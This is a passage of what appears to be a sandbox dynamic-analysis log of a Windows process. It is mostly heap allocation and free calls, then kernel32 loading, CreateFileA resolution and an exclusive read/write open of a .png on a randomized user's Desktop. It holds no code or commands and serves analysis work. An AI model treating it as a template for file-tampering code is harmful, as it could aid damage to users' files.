(HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.123] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.123] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.124] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.124] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.124] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.125] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.125] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.126] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.126] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.126] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76df58 [0075.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76df58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.127] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df58 [0075.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76df58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.127] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.127] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.127] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0075.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x41) returned 0x76f100 [0075.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", cchWideChar=65, lpMultiByteStr=0x76f100, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpUsedDefaultChar=0x0) returned 65 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.128] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.128] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.128] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x82) returned 0x6b9e98 [0075.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=65, lpWideCharStr=0x6b9e98, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png") returned 65 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698600 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.129] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.130] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.130] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.130] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: 